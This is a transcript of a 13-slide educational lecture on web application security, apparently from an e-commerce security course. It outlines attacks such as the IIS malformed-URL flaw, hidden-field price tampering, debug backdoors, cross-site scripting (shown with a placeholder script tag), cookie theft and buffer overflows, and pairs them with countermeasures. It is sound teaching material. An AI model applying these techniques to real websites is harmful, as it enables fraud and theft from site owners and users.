1 / 13

Security of Web Applications

Security of Web Applications. Jamshid Shokrollahi E-Commerce Security. Overview. Why Web application security? Some attacks on web applications and corresponding countermeasures. Why Web application security?. Reduce cost of recovery and fixes Ensure customer trust

rparkhurst
Télécharger la présentation

Security of Web Applications

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Security of Web Applications Jamshid Shokrollahi E-Commerce Security

  2. Overview • Why Web application security? • Some attacks on web applications and corresponding countermeasures

  3. Why Web application security? • Reduce cost of recovery and fixes • Ensure customer trust • Encourage website adoption • Maintain competitive advantages • Manage legal risks

  4. Some attacks on Web Applications • Known vulnerabilities and misconfigurations • Hidden fields • Backdoor and debug options • Cross-site scripting • Cookie poisoning • Buffer overflow

  5. Known vulnerabilities and misconfigurations • October 2000: Microsoft’s IIS • A malformed URL lets the malicious user to navigate in the logical drive of the web server. • Runs under the security context of the IUSR_machinename which is anonymous account for the IIS and belongs to the everyone and guests account. Security Bulletin MS00-078: • … in IIS 4.0 and 5.0, a particular type of malformed URL … enables a malicious user ... to add, change or delete data, run code already on the server, or upload new code to the server and run it. …

  6. Tampering Hidden fields • Hidden fields in forms could contain passwords or prices which must be submitted back to the server. • They can be viewed or modified by clients and submitted back.

  7. Wrong order Web server Database server Form to be filled by orders containing prices as hidden fields Unit prices (hidden fields) are reduced. Web user Tampering Hidden fields The forms should be validated and passwords should not be sent to the clients.

  8. Backdoor and debug options • Backdoor options are built into applications during debugging. • Programmers build shortcuts to avoid logging in for every round of debugging. • Because of time limits debugging versions are put on the web.

  9. Threats caused by scripts • CERT Advisory CA-1997-20 • Impact: Enables monitoring web activities • Cause: Vulnerabilities in browsers (javascript) • Solution: upgrade browser or disable javascript • CERT Vulnerability Note VU#800893 • Impact: Disclosing files • Cause: Vulnerability in the implementation of GetObject in IE (VBscript) • Solution: download patch or disable active scripting in IE especially when visiting untrusted sites.

  10. Cross-site scripting Malicious • Hope browsers are not patched • Put malicious codes on innocent web-pages • Submit texts including: <SCRIPT>malicious code</SCRIPT> Others download the code • Abuse of <FORM> tag • Internet Explorer security "zones" can be subverted by this technique

  11. Cookie-based attacks • Like hidden field attack when parameters are saved in cookies. • Packet-sniffing for to still identities which are saved in cookies • Using digital signatures and cryptography • Using CSS to send cookies to other servers, even cryptography does not help

  12. Buffer overflow • Some kind of denial of service attacks • Malicious users can sometimes run their own program • Overwriting stack with the address of their programs

  13. Bibliography • Gunter Ollmann, HTML Code Injection and Cross-site scripting,http://www.technicalinfo.net/papers/CSS.html • CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests, http://www.cert.org/advisories/CA-2000-02.html • Wikipedia

More Related